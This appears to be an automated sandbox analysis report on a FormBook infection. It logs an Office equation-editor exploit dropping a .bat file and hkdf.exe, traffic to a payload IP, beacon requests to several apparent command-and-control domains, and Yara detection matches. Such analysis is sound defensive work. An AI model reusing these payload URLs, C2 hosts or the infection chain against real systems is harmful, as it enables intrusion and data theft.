Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Dec 2021 13:49:02 GMTServer: ApacheLast-Modified: Mon, 13 Sep 2021 23:53:44 GMTETag: "328-5cbe92ce033f6"Accept-Ranges: bytesContent-Length: 808X-Powered-By: PleskLinConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 69 73 20 70 61 67 65 20 65 69 74 68 65 72 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2c 20 6f 72 20 69 74 20 6d 6f 76 65 64 20 73 6f 6d 65 77 68 65 72 65 20 65 6c 73 65 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>404 Not Found</title> <link rel="stylesheet" href="/error_docs/styles.
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 15 Dec 2021 13:49:39 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Dec 2021 13:49:57 GMTServer: Apache/2.4.46 (Win32) OpenSSL/1.1.1g mod_fcgid/2.3.9aContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.187

Source: explorer.exe, 00000007.00000000.441178174.0000000002AE0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: explorer.exe, 00000007.00000000.441178174.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000007.00000000.441178174.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000007.00000000.466435720.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000007.00000000.466435720.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000007.00000000.441178174.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000007.00000000.441178174.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000007.00000000.451841396.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.433529805.0000000004513000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000007.00000000.441178174.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000007.00000000.445889407.0000000008320000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A29B523B-0D1C-4716-BA51-DCCF135A5BFC}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: www.ridvanyilmaz.com

Source: global traffic	HTTP traffic detected: GET /LaXgQ8hib9fwKQI.bat HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 2.56.57.187Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /b62n/?7ng=k0GpdJo86r2&VrxdA6JP=CkbDaw0w78FnUUGmsS8khblO1m9LoxhjWgnULl67DqIIYbf1Mw49JamKO+kmV1m+rdKGzg== HTTP/1.1Host: www.ridvanyilmaz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b62n/?VrxdA6JP=pEQZAUdavhsqZJkN83QQx5vUzCZ7bVbXRO/iD/+E6RM5nTIKuIu5/L5eTQ9xaMo7/J5LQA==&7ng=k0GpdJo86r2 HTTP/1.1Host: www.atlasconcretos.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b62n/?VrxdA6JP=RV/S0wPXEG6CXRSSMKnov5Df6lzEYpgbtRkMDrTyCZrZsrYIsxb4Wyn5lCyUpYtxxVTqxA==&7ng=k0GpdJo86r2 HTTP/1.1Host: www.digitize-vision.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b62n/?7ng=k0GpdJo86r2&VrxdA6JP=Ry9//1u1KSBgvJVTMKtsoBLsTLEtS61U1s5lXOGkeFjYXUCmgqEi+s/kbRLZIKsosKg42g== HTTP/1.1Host: www.bagways.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b62n/?VrxdA6JP=4vMzR1O6TdRvdnjwNsxZKAWsXyEcarJE8V5Wgs9HzMhC/KpAuLZfktwaHjQNhKT+WAJJHA==&7ng=k0GpdJo86r2 HTTP/1.1Host: www.xn--growbb-fvab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b62n/?7ng=k0GpdJo86r2&VrxdA6JP=zigQYQl5UzFlMNnRx6FEMCOrGb7IataJR35zF0KDFEJa6c5GJb0linXPwXtb/lrtaJB0WA== HTTP/1.1Host: www.multidetoxhepatico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b62n/?VrxdA6JP=IxnxMsk6Wllyu7aaf2DybOktFmU9HSWwHr0GL2zVz1catFUyroC1Dw2DbvezW0NZbbspDQ==&7ng=k0GpdJo86r2 HTTP/1.1Host: www.ktieman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b62n/?7ng=k0GpdJo86r2&VrxdA6JP=2z8/DFBk6RpWpVb2yB1064sDrPXSeSOfJo6AXswKq2sMG6ZpedajFkWvnUFPGoiFanmBYQ== HTTP/1.1Host: www.ff4c2myy0.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 6.0.hkdf.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.hkdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.hkdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.hkdf.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.hkdf.exe.39d8b40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.hkdf.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.hkdf.exe.3ce4180.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.hkdf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.hkdf.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.461713601.00000000003C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.674851184.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.421161795.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.674778890.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.446591124.00000000097EC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.421641009.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.425109708.00000000038F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.461663216.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.453880697.00000000097EC000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 6.0.hkdf.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.hkdf.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.hkdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.hkdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.hkdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.hkdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.hkdf.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.hkdf.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.hkdf.exe.39d8b40.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.hkdf.exe.39d8b40.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.hkdf.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.hkdf.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.hkdf.exe.3ce4180.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.hkdf.exe.3ce4180.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.hkdf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.hkdf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.461713601.00000000003C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.461713601.00000000003C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.674851184.0000000000240000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.674851184.0000000000240000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.421161795.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.421161795.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.674778890.0000000000130000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.674778890.0000000000130000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.446591124.00000000097EC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.446591124.00000000097EC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.421641009.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.421641009.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.425109708.00000000038F9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.425109708.00000000038F9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.461663216.0000000000240000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.461663216.0000000000240000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.453880697.00000000097EC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.453880697.00000000097EC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\LaXgQ8hib9fwKQI[1].bat			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\hkdf.exe			Jump to dropped file

Source: 6.0.hkdf.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.hkdf.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.hkdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.hkdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.hkdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.hkdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.hkdf.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.hkdf.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.hkdf.exe.39d8b40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.hkdf.exe.39d8b40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.hkdf.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.hkdf.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.hkdf.exe.3ce4180.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.hkdf.exe.3ce4180.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
